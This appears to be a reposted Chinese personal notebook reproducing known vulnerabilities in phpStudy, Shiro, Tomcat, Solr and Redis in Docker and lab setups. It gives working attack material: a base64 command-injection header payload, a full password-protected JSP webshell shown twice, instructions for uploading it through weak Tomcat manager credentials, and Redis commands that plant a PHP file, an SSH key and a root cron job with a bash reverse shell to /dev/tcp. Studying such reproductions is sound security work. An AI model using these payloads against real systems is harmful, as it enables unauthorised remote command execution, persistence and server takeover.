漏洞復現
- 我的漏洞復現記錄以及
EXP編寫。
漏洞庫
phpstudy
- 實測2016的PHP-5.4,2018的PHP-5.2.17和PHP-5.4.45都存在此漏洞
- 注意請求頭的
Accept-Encoding後應去掉空格,Accept-Charset後值爲base64編碼,c3lzdGVtKCd3aG9hbWknKTs=解密爲system('whoami');注意後面有分號
Shiro RCE(cve-2016-4437)
環境搭建
- 基於
Docker,一鍵搭建,而後訪問本地http://127.0.0.1:9000/
docker pull medicean/vulapps:s_shiro_1 docker run -d -p 9000:8080 medicean/vulapps:s_shiro_1
BurpSuite Check Tools
- 還沒找到合適的Burp插件,能夠手動添加字段
rememberMe,有回顯則是shiro框架
EXP
Tomcat Rce(CVE-2020-1938)
環境搭建
- 基於
Docker,一鍵搭建,影響Apache Tomcat 6,7 < 7.0.100,8 < 8.5.51,9 < 9.0.31.
docker pull duonghuuphuc/tomcat-8.5.32 docker run -d -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32
EXP
- EXP,無腦EXP直接打就完事
Tomcat WAR BackDoor
- 復現環境---BUUOJ
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
- 訪問後臺路徑
/manager/html/發現弱口令tomcat tomcat,登陸後上傳war文件(將上面代碼寫入shell.jsp,再壓縮成zip文件,最後更改shell.zip爲401.war便可)
Tomcat PUT(CVE-2017-12615)
- 復現環境----BUUOJ
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
EXP
- 這裏就不貼了吧,後面直接上傳GitHub,雖然這個洞幾乎都沒得了,可是仔細一點總沒錯嘛!
Solr RCE(CVE-2019-17558)
環境搭建
- 基於
vulhub的docker環境包.影響Apache Solr 5.0.0版本至8.3.1,漏洞緣由,params.resource.loader.enabled配置不當,咱們能夠自定義模板,從而任意執行命令
git clone https://github.com/vulhub/vulhub.git cd vulhub/solr/CVE-2019-17558/ docker-compose up -d
- 發現方式可目錄掃描或端口掃描(注意普通方式可能不會發現
8983端口),
EXP
- 不知道爲啥網上的EXP打不通,因而乎本身寫了一個,後面會都放在GitHub.
- 首先查看有哪些
core name
- 更改
params.resource.loader.enabled配置
- 查看是否更改爲功
Redis Getshell(Linux)
環境搭建
Ubuntu系統,一鍵式安裝,更改配置爲未受權.而後啓動服務便可
sudo apt install gcc && wget http://download.redis.io/releases/redis-5.0.3.tar.gz && tar -zxvf redis-5.0.3.tar.gz && cd redis-5.0.3 && make
- 修改
Redis啓動配置文件redis.conf,將bind 127.0.0.1改成bind 0.0.0.0,關閉保護模式,protected-mode yes改成``protected-mode no`,最後保存退出. - 啓動服務
sudo ./redis-server ../redis.conf
Webshell
config set dir /var/www/html/ config set dbfilename info.php set payload "<?php phpinfo();?>" save
SSH公私鑰
- 生成公私鑰,連續三次回車便可
ssh-keygen -t rsa
config set dir /home/forever404/.ssh/ config set dbfilename authorized_keys set payload "\n\n\nid_rsa.pub\n\n\n" save
定時計劃反彈Shell
- 注意這個需在
Centos上方可實現,Ubuntu上親測不能夠,碼.sudo systemctl stop firewalld.service關閉防火牆,
config set dir /var/spool/cron/ config set dbfilename root set paylaod "\n\n\n* * * * * bash -i >& /dev/tcp/172.x.x.x/8888 0>&1\n\n\n" save
主從複製
- 這個
Redis的版本必須是4.0-5.0之間,顯然看出來上面幾種方法都會留下"痕跡",且要求路徑,和文件寫入權限等,因而乎有了新的利用方式.Redis-RCE,redis-post-exploitation.pdf.
相關文章
- 1. 漏洞復現
- 2. MS11_003漏洞復現
- 3. CMS漏洞復現
- 4. Everything漏洞復現
- 5. ms17_010漏洞復現
- 6. [漏洞復現] CVE-2017-16995 Ubuntu16.04漏洞復現
- 7. 【漏洞復現】WinRAR目錄穿越漏洞(CVE-2018-20250)復現
- 8. 【漏洞復現】MS08-067經典遠程溢出漏洞復現
- 9. 經典漏洞MS11_003漏洞復現(windows7IE溢出漏洞)
- 10. [漏洞復現] Apache Solr RCE
- 更多相關文章...
- • ionic 複選框 - ionic 教程
- • XSD 複合元素 - XML Schema 教程
- • ☆基於Java Instrument的Agent實現
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
